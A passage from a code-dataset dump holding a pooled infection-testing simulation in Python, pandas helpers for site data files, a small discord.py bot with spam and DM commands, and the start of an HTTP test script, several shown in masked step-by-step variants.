id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n #print(np.random.get_state()[1][0])\n random_table = np.random.binomial(size = size, p = p, n = 1)\n test_array = np.zeros((size, 2), dtype = int)\n for i in range(size):\n test_array[i,0] = i\n test_array[i,1] = random_table[i]\n return test_array\n\n\ndef test_result(data, seq_test, **kwargs):\n \"\"\"\n a helper function provides convenient results for a given test method with its **kwargs\n\n Input:\n data (array or list of arrays)\n seq_test (test_method object): could be seq_test, matrix_test and other test_method objects\n Output:\n result (DataFrame): a dataframe contains important evaluation metrics for the test method \n \"\"\"\n if isinstance(data, list) == False:\n \n 
pred,consum, ind_con = seq_test(data, **kwargs)\n result = {'acc': np.mean(pred[:,1] == data[:,1]),\n 'sens': recall_score(data[:,1], pred[:,1]),\n 'spec': specificity_score(data[:,1], pred[:,1]),\n 'PPV': precision_score(data[:, 1], pred[:,1]),\n 'NPV': npv_score(data[:, 1], pred[:,1]),\n 'test_consum': consum,\n 'ind_consum': ind_con,\n 'batch_consum': consum - ind_con}\n return result\n else:\n length = len(data)\n acc = np.zeros(length)\n sens = np.zeros(length)\n spec = np.zeros(length)\n ppv = np.zeros(length)\n npv = np.zeros(length)\n test_consum = np.zeros(length)\n ind_consum = np.zeros(length)\n batch_consum = np.zeros(length)\n for i in range(length):\n \n pred,consum, ind_con = seq_test(data[i], **kwargs)\n \n acc[i] = np.mean(pred[:,1] == data[i][:,1])\n sens[i] = recall_score(data[i][:,1], pred[:,1])\n spec[i] = specificity_score(data[i][:,1], pred[:,1])\n ppv[i] = precision_score(data[i][:,1], pred[:,1])\n npv[i] = npv_score(data[i][:,1], pred[:,1])\n test_consum[i] = consum\n ind_consum[i] = ind_con\n batch_consum[i] = consum-ind_con\n\n result = {'acc': acc,\n 'sens': sens,\n 'spec': spec,\n 'PPV': ppv,\n 'NPV': npv,\n 'test_consum': test_consum,\n 'ind_consum': ind_consum,\n 'batch_consum': batch_consum}\n return pd.DataFrame(result)\n\n\n\ndef matrix_test(subject_array, side_length, typeII_error, typeI_error, sq_repeat = 1 ,ind_repeat = 1, seq = True):\n\n \"\"\"\n This function provides the matrix testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n side_length (int): the side length of the matrix testing\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n sq_repeat (int): the number of parallel testing for the column/row batch testing\n ind_repeat (int): the number of potential individual testing for the positive crossings\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n\n\n\n matrix_test_num = len(subject_array)//(side_length**2)\n matrix_test_array = subject_array[0:matrix_test_num*side_length**2, :]\n ind_test_array = subject_array[matrix_test_num*side_length**2:, :]\n \n ind_idx = []\n \n for temp_batch in np.array_split(matrix_test_array, matrix_test_num):\n temp_batch = temp_batch.reshape(side_length, side_length, 2)\n temp_row = []\n temp_col = []\n random_num_row = np.random.uniform(0, 1, sq_repeat)\n random_num_col = np.random.uniform(0, 1, sq_repeat)\n for i in range(side_length):\n if 1 in (temp_batch[i,:,1]):\n if max(random_num_row) > typeII_error:\n temp_row.append(temp_batch[i,:,0])\n else:\n if min(random_num_row) < typeI_error:\n temp_row.append(temp_batch[i, :, 0])\n if 1 in (temp_batch[:,i,1]):\n if max(random_num_col) > typeII_error:\n temp_col.append(temp_batch[:,i,0])\n else:\n if min(random_num_col) < typeI_error:\n temp_col.append(temp_batch[:, i, 0])\n ind_idx.append(np.intersect1d(temp_row, temp_col))\n\n ind_idx = np.concatenate(ind_idx)\n ind_idx = ind_idx.astype('int')\n \n if len(ind_idx) == 0:\n neg_array = matrix_test_array\n else:\n mask = np.zeros(subject_array.shape[0], dtype = bool)\n mask[ind_idx] = True\n mask[matrix_test_num*side_length**2:] = True\n ind_test_array = subject_array[mask,:]\n \n \n neg_array = subject_array[~mask, :]\n \n\n \n \n neg_array[:, 1] = 0\n \n ind_test, ind_con = conventional_test(ind_test_array,\n typeII_error, typeI_error, repeat = ind_repeat, seq = seq)\n \n \n \n batch_test_num = matrix_test_num * 2 * side_length * sq_repeat\n result = np.concatenate((neg_array, ind_test))\n result = result[result[:, 0].argsort()]\n \n return (result, batch_test_num + ind_con, ind_con)\n\n\ndef parallel_batch_testing(subject_array, batch_size, typeII_error, typeI_error, parallel_num, ind_repeat, seq):\n\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n parallel_num (int): the number of parallel testing for the batch testing\n ind_repeat (int): the number of potential individual testing for the positive batches\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n\n\n\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array)/batch_size)* parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(subject_array)/batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in (temp_batch[:, 1]):\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n else:\n if random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])\n\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch, typeII_error, typeI_error,\n repeat = ind_repeat, seq = seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, batch_consum+individual_con, individual_con)\n \n\ndef fixed_batch_seq_test(subject_array,stop_rule, p, batch_size, typeII_error, typeI_error, repeat, prob_threshold = 0.3, seq = True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n \n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array,\n 'NB_Num': 0,\n 'PB_Num': 0,\n 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],\n typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0),\n 'NB_Num': i['NB_Num'] + 1,\n 'PB_Num': i['PB_Num'],\n 'p': p0,\n 'batch_size': batch_size}\n temp1 = {'data': np.random.permutation(temp1),\n 'NB_Num': i['NB_Num'],\n 'PB_Num': i['PB_Num'] + 1,\n 'p': p1,\n 'batch_size': batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n \n if len(temp1['data'])>0:\n if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con \n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n \n neg_array[:,1] = 0\n individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, consum, individual_con)\n\n\n \ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2*n-1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n\n temp = temp_cur\n\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n\n return output, neg_symbol, pos_symbol\n\n\n\ndef seq_test_with_node(subject_array,stop_rule,p, batch_size, typeII_error, typeI_error, repeat = 1, \nprob_threshold = 1, seq = True, batch_limit = 32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold 
(float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array,\n 'NB_Num': 0,\n 'PB_Num': 0,\n 'p': p,\n 'batch_size': batch_size,\n 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],\n typeII_error, typeI_error, \n batch_limit = batch_limit)\n temp0 = {'data': temp0,\n 'NB_Num': i['NB_Num'] + 1,\n 'PB_Num': i['PB_Num'],\n 'p': p0,\n 'batch_size': n0,\n 'node': i['node'] + '-'}\n temp1 = {'data': temp1,\n 'NB_Num': i['NB_Num'],\n 'PB_Num': i['PB_Num'] + 1,\n 'p': p1,\n 'batch_size': n1,\n 'node': i['node'] + '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n \n if len(temp1['data'])>0:\n if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum) \n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:,0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n #print(neg_array)\n #print(neg_node)\n #neg_node = np.concatenate(neg_node)\n\n for k in pos_list:\n pos_array.append(k['data'])\n #pos_node.append(k['node'])\n #pos_node.append(np.column_stack((k['data'][:,0],np.repeat(k['node'], len(k['data'])))))\n temp = [[x, k['node']] for x in k['data'][:,0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n #pos_node = np.concatenate(pos_node)\n\n \n neg_array[:,1] = 0\n individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n #node = np.concatenate((pos_node, neg_node))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n #node = node[node[:,0].argsort()]\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, consum, individual_con, node, batch_num_list)\n\n\n\n\n\n\n",
"step-ids": [
10,
14,
15,
17,
20
]
}
|
[
10,
14,
15,
17,
20
] |
import pandas as pd
def _get_site_name(f,i):
data_file = f +"\\"+"new_desc_sele_data.csv"
site_name=pd.read_csv(data_file)["SITE_ID"][i]
return site_name
def _get_site_DD_dataset_csv(f,i):
'''获取经过全部数据集(经过全部的特征选择)'''
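    # (Docstring above, in English: "Load the full dataset, i.e. after all feature selection.")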
site_path=_get_site_folder(f,i)
data_path=site_path+"\\data_confirm.csv"
data=pd.read_csv(data_path)
return data
def _get_site_IGBP(f,i):
data_file = f +"\\"+"new_desc_sele_data_origin.csv"
site_IGBP=pd.read_csv(data_file)["IGBP"][i]
return site_IGBP
def _get_site_feature_ale(f,i,feauture):
site_path=_get_site_folder(f,i)
prefix="ale_1_"
if type(feauture) is str:
ale_path=site_path+"\\"+prefix+feauture+".csv"
ale_data=pd.read_csv(ale_path)
return ale_data
def _get_version_res_folder(f,version,site_name=None,i=None):
import os
version_folder=f+"\\"+version
if i:
site_name=_get_site_name(f,i)
elif site_name:
site_name = site_name
if os.path.exists(version_folder):
site_version_res_folder=version_folder+"\\"+site_name
if os.path.exists(site_version_res_folder):
return site_version_res_folder
else:
os.mkdir(site_version_res_folder)
return site_version_res_folder
def _get_site_folder(f,i=None,feature_name=None):
data_file = f + "\\" + "new_desc_sele_data_origin.csv"
data_content = pd.read_csv(data_file)
print(feature_name)
if type(i) is int:
site_path=data_content["SITE_PATH"][i]
return site_path
elif type(feature_name) is str:
site_path = data_content["SITE_PATH"][data_content["SITE_ID"]==feature_name].values[0]
return site_path
else:
print("lack of index or feature_name.")
|
normal
|
{
"blob_id": "c034fba0b9204545b00ba972a17e63cf9c20854e",
"index": 3930,
"step-1": "<mask token>\n\n\ndef _get_site_name(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data.csv'\n site_name = pd.read_csv(data_file)['SITE_ID'][i]\n return site_name\n\n\n<mask token>\n\n\ndef _get_version_res_folder(f, version, site_name=None, i=None):\n import os\n version_folder = f + '\\\\' + version\n if i:\n site_name = _get_site_name(f, i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder = version_folder + '\\\\' + site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\n\ndef _get_site_folder(f, i=None, feature_name=None):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path = data_content['SITE_PATH'][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content['SITE_PATH'][data_content['SITE_ID'] ==\n feature_name].values[0]\n return site_path\n else:\n print('lack of index or feature_name.')\n",
"step-2": "<mask token>\n\n\ndef _get_site_name(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data.csv'\n site_name = pd.read_csv(data_file)['SITE_ID'][i]\n return site_name\n\n\ndef _get_site_DD_dataset_csv(f, i):\n \"\"\"获取经过全部数据集(经过全部的特征选择)\"\"\"\n site_path = _get_site_folder(f, i)\n data_path = site_path + '\\\\data_confirm.csv'\n data = pd.read_csv(data_path)\n return data\n\n\n<mask token>\n\n\ndef _get_version_res_folder(f, version, site_name=None, i=None):\n import os\n version_folder = f + '\\\\' + version\n if i:\n site_name = _get_site_name(f, i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder = version_folder + '\\\\' + site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\n\ndef _get_site_folder(f, i=None, feature_name=None):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path = data_content['SITE_PATH'][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content['SITE_PATH'][data_content['SITE_ID'] ==\n feature_name].values[0]\n return site_path\n else:\n print('lack of index or feature_name.')\n",
"step-3": "<mask token>\n\n\ndef _get_site_name(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data.csv'\n site_name = pd.read_csv(data_file)['SITE_ID'][i]\n return site_name\n\n\ndef _get_site_DD_dataset_csv(f, i):\n \"\"\"获取经过全部数据集(经过全部的特征选择)\"\"\"\n site_path = _get_site_folder(f, i)\n data_path = site_path + '\\\\data_confirm.csv'\n data = pd.read_csv(data_path)\n return data\n\n\ndef _get_site_IGBP(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n site_IGBP = pd.read_csv(data_file)['IGBP'][i]\n return site_IGBP\n\n\ndef _get_site_feature_ale(f, i, feauture):\n site_path = _get_site_folder(f, i)\n prefix = 'ale_1_'\n if type(feauture) is str:\n ale_path = site_path + '\\\\' + prefix + feauture + '.csv'\n ale_data = pd.read_csv(ale_path)\n return ale_data\n\n\ndef _get_version_res_folder(f, version, site_name=None, i=None):\n import os\n version_folder = f + '\\\\' + version\n if i:\n site_name = _get_site_name(f, i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder = version_folder + '\\\\' + site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\n\ndef _get_site_folder(f, i=None, feature_name=None):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path = data_content['SITE_PATH'][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content['SITE_PATH'][data_content['SITE_ID'] ==\n feature_name].values[0]\n return site_path\n else:\n print('lack of index or feature_name.')\n",
"step-4": "import pandas as pd\n\n\ndef _get_site_name(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data.csv'\n site_name = pd.read_csv(data_file)['SITE_ID'][i]\n return site_name\n\n\ndef _get_site_DD_dataset_csv(f, i):\n \"\"\"获取经过全部数据集(经过全部的特征选择)\"\"\"\n site_path = _get_site_folder(f, i)\n data_path = site_path + '\\\\data_confirm.csv'\n data = pd.read_csv(data_path)\n return data\n\n\ndef _get_site_IGBP(f, i):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n site_IGBP = pd.read_csv(data_file)['IGBP'][i]\n return site_IGBP\n\n\ndef _get_site_feature_ale(f, i, feauture):\n site_path = _get_site_folder(f, i)\n prefix = 'ale_1_'\n if type(feauture) is str:\n ale_path = site_path + '\\\\' + prefix + feauture + '.csv'\n ale_data = pd.read_csv(ale_path)\n return ale_data\n\n\ndef _get_version_res_folder(f, version, site_name=None, i=None):\n import os\n version_folder = f + '\\\\' + version\n if i:\n site_name = _get_site_name(f, i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder = version_folder + '\\\\' + site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\n\ndef _get_site_folder(f, i=None, feature_name=None):\n data_file = f + '\\\\' + 'new_desc_sele_data_origin.csv'\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path = data_content['SITE_PATH'][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content['SITE_PATH'][data_content['SITE_ID'] ==\n feature_name].values[0]\n return site_path\n else:\n print('lack of index or feature_name.')\n",
"step-5": "import pandas as pd\n\n\ndef _get_site_name(f,i):\n data_file = f +\"\\\\\"+\"new_desc_sele_data.csv\"\n site_name=pd.read_csv(data_file)[\"SITE_ID\"][i]\n return site_name\n\ndef _get_site_DD_dataset_csv(f,i):\n '''获取经过全部数据集(经过全部的特征选择)'''\n site_path=_get_site_folder(f,i)\n data_path=site_path+\"\\\\data_confirm.csv\"\n data=pd.read_csv(data_path)\n return data\n\n\ndef _get_site_IGBP(f,i):\n data_file = f +\"\\\\\"+\"new_desc_sele_data_origin.csv\"\n site_IGBP=pd.read_csv(data_file)[\"IGBP\"][i]\n return site_IGBP\n\ndef _get_site_feature_ale(f,i,feauture):\n site_path=_get_site_folder(f,i)\n prefix=\"ale_1_\"\n if type(feauture) is str:\n ale_path=site_path+\"\\\\\"+prefix+feauture+\".csv\"\n ale_data=pd.read_csv(ale_path)\n return ale_data\n\ndef _get_version_res_folder(f,version,site_name=None,i=None):\n import os\n version_folder=f+\"\\\\\"+version\n if i:\n site_name=_get_site_name(f,i)\n elif site_name:\n site_name = site_name\n if os.path.exists(version_folder):\n site_version_res_folder=version_folder+\"\\\\\"+site_name\n if os.path.exists(site_version_res_folder):\n return site_version_res_folder\n else:\n os.mkdir(site_version_res_folder)\n return site_version_res_folder\n\ndef _get_site_folder(f,i=None,feature_name=None):\n data_file = f + \"\\\\\" + \"new_desc_sele_data_origin.csv\"\n data_content = pd.read_csv(data_file)\n print(feature_name)\n if type(i) is int:\n site_path=data_content[\"SITE_PATH\"][i]\n return site_path\n elif type(feature_name) is str:\n site_path = data_content[\"SITE_PATH\"][data_content[\"SITE_ID\"]==feature_name].values[0]\n return site_path\n else:\n print(\"lack of index or feature_name.\")\n\n\n\n\n\n\n\n\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@bot.event
async def on_ready():
print(f'Logged in as {bot.user.name}')
@bot.command()
async def ping(ctx):
await ctx.send('pong')
@bot.command()
async def lucky(ctx):
spamCount = random.randint(0, 50)
for num in range(int(spamCount)):
await ctx.message.author.send('ARE YOU FELLING LUCKY???')
@bot.command()
async def spam(ctx, spamCtx='spam', spamCount=1):
for num in range(int(spamCount)):
await ctx.send(str(spamCtx))
@bot.command()
async def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):
spamCount = 10
for num in range(int(spamCount)):
await user.send(message)
if __name__ == '__main__':
bot.run(os.environ['TOKEN'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
bot = commands.Bot(command_prefix='!')
@bot.event
async def on_ready():
print(f'Logged in as {bot.user.name}')
@bot.command()
async def ping(ctx):
await ctx.send('pong')
@bot.command()
async def lucky(ctx):
spamCount = random.randint(0, 50)
for num in range(int(spamCount)):
await ctx.message.author.send('ARE YOU FELLING LUCKY???')
@bot.command()
async def spam(ctx, spamCtx='spam', spamCount=1):
for num in range(int(spamCount)):
await ctx.send(str(spamCtx))
@bot.command()
async def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):
spamCount = 10
for num in range(int(spamCount)):
await user.send(message)
if __name__ == '__main__':
bot.run(os.environ['TOKEN'])
<|reserved_special_token_1|>
from discord.ext import commands
import discord
import os
import random
bot = commands.Bot(command_prefix='!')
@bot.event
async def on_ready():
print(f'Logged in as {bot.user.name}')
@bot.command()
async def ping(ctx):
await ctx.send('pong')
@bot.command()
async def lucky(ctx):
spamCount = random.randint(0, 50)
for num in range(int(spamCount)):
await ctx.message.author.send('ARE YOU FELLING LUCKY???')
@bot.command()
async def spam(ctx, spamCtx='spam', spamCount=1):
for num in range(int(spamCount)):
await ctx.send(str(spamCtx))
@bot.command()
async def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):
spamCount = 10
for num in range(int(spamCount)):
await user.send(message)
if __name__ == '__main__':
bot.run(os.environ['TOKEN'])
<|reserved_special_token_1|>
from discord.ext import commands
import discord
import os
import random
bot = commands.Bot(command_prefix="!")
@bot.event
async def on_ready():
print(f"Logged in as {bot.user.name}")
@bot.command()
async def ping(ctx):
await ctx.send("pong")
# Lucky command, it picks a number between 0-50 and spams your dm's with that number
@bot.command()
async def lucky(ctx):
spamCount = random.randint(0, 50)
for num in range(int(spamCount)):
await ctx.message.author.send("ARE YOU FELLING LUCKY???")
# Basic spam command, you can provide a message and specify how many messages
@bot.command()
async def spam(ctx, spamCtx="spam", spamCount=1):
for num in range(int(spamCount)):
await ctx.send(str(spamCtx))
# Lets you mention a specific user who would like to spam in their DM's, you can specify a message
@bot.command()
async def attack(ctx, user: discord.User, *, message="GET SPAMMED NERD"):
spamCount = 10
for num in range(int(spamCount)):
await user.send(message)
if __name__ == "__main__":
bot.run(os.environ['TOKEN'])
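
# --- Editor's note: how these commands would be invoked (not part of the original file). ---
# The bot reads its token from the TOKEN environment variable, so something along the lines of
#   export TOKEN=<your-bot-token> && python <this file>
# would start it. In a channel the commands then look like:
#   !ping              -> replies "pong"
#   !spam hello 5      -> sends "hello" five times
#   !lucky             -> DMs the author a random number (0-50) of messages
#   !attack @someone   -> DMs the mentioned user 10 times
# The invocation details above are assumptions inferred from the command signatures.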
|
flexible
|
{
"blob_id": "b48bc9475a8dc593ba858af8ed4e930ae290fd69",
"index": 6479,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]\nasync def on_ready():\n print(f'Logged in as {bot.user.name}')\n\n\[email protected]()\nasync def ping(ctx):\n await ctx.send('pong')\n\n\[email protected]()\nasync def lucky(ctx):\n spamCount = random.randint(0, 50)\n for num in range(int(spamCount)):\n await ctx.message.author.send('ARE YOU FELLING LUCKY???')\n\n\[email protected]()\nasync def spam(ctx, spamCtx='spam', spamCount=1):\n for num in range(int(spamCount)):\n await ctx.send(str(spamCtx))\n\n\[email protected]()\nasync def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):\n spamCount = 10\n for num in range(int(spamCount)):\n await user.send(message)\n\n\nif __name__ == '__main__':\n bot.run(os.environ['TOKEN'])\n",
"step-3": "<mask token>\nbot = commands.Bot(command_prefix='!')\n\n\[email protected]\nasync def on_ready():\n print(f'Logged in as {bot.user.name}')\n\n\[email protected]()\nasync def ping(ctx):\n await ctx.send('pong')\n\n\[email protected]()\nasync def lucky(ctx):\n spamCount = random.randint(0, 50)\n for num in range(int(spamCount)):\n await ctx.message.author.send('ARE YOU FELLING LUCKY???')\n\n\[email protected]()\nasync def spam(ctx, spamCtx='spam', spamCount=1):\n for num in range(int(spamCount)):\n await ctx.send(str(spamCtx))\n\n\[email protected]()\nasync def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):\n spamCount = 10\n for num in range(int(spamCount)):\n await user.send(message)\n\n\nif __name__ == '__main__':\n bot.run(os.environ['TOKEN'])\n",
"step-4": "from discord.ext import commands\nimport discord\nimport os\nimport random\nbot = commands.Bot(command_prefix='!')\n\n\[email protected]\nasync def on_ready():\n print(f'Logged in as {bot.user.name}')\n\n\[email protected]()\nasync def ping(ctx):\n await ctx.send('pong')\n\n\[email protected]()\nasync def lucky(ctx):\n spamCount = random.randint(0, 50)\n for num in range(int(spamCount)):\n await ctx.message.author.send('ARE YOU FELLING LUCKY???')\n\n\[email protected]()\nasync def spam(ctx, spamCtx='spam', spamCount=1):\n for num in range(int(spamCount)):\n await ctx.send(str(spamCtx))\n\n\[email protected]()\nasync def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):\n spamCount = 10\n for num in range(int(spamCount)):\n await user.send(message)\n\n\nif __name__ == '__main__':\n bot.run(os.environ['TOKEN'])\n",
"step-5": "from discord.ext import commands\nimport discord\nimport os\nimport random\n\nbot = commands.Bot(command_prefix=\"!\")\n\[email protected]\nasync def on_ready():\n print(f\"Logged in as {bot.user.name}\")\n\n\[email protected]()\nasync def ping(ctx):\n await ctx.send(\"pong\")\n\n\n# Lucky command, it picks a number between 0-50 and spams your dm's with that number\[email protected]()\nasync def lucky(ctx):\n spamCount = random.randint(0, 50)\n for num in range(int(spamCount)):\n await ctx.message.author.send(\"ARE YOU FELLING LUCKY???\")\n\n# Basic spam command, you can provide a message and specify how many messages\[email protected]()\nasync def spam(ctx, spamCtx=\"spam\", spamCount=1):\n for num in range(int(spamCount)):\n await ctx.send(str(spamCtx))\n\n# Lets you mention a specific user who would like to spam in their DM's, you can specify a message\[email protected]()\nasync def attack(ctx, user: discord.User, *, message=\"GET SPAMMED NERD\"):\n spamCount = 10\n for num in range(int(spamCount)):\n await user.send(message)\n\nif __name__ == \"__main__\":\n bot.run(os.environ['TOKEN'])",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
test_f.close()
<|reserved_special_token_0|>
expected_f.close()
assert len(inputs) == len(expecteds)
for i in range(len(inputs)):
connection.request('GET', '<start>%s<end>' % inputs[i])
response = connection.getresponse()
if response.status != 200:
print('Request failed for input: %s. Reason: %s' % (inputs[i],
response.reason))
output = response.read()
print('Output:', output)
print('Expected:', expecteds[i])
if expecteds[i] == output:
print('SUCCESS')
else:
print('FAILURE')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
http_server = 'localhost:8000'
connection = httplib.HTTPConnection(http_server)
test_file_path = 'test_input'
test_f = open(test_file_path)
inputs = test_f.readlines()
inputs = [x.strip() for x in inputs]
test_f.close()
expected_file_path = 'expected'
expected_f = open(expected_file_path)
expecteds = expected_f.readlines()
expecteds = [x.strip() for x in expecteds]
expected_f.close()
assert len(inputs) == len(expecteds)
for i in range(len(inputs)):
connection.request('GET', '<start>%s<end>' % inputs[i])
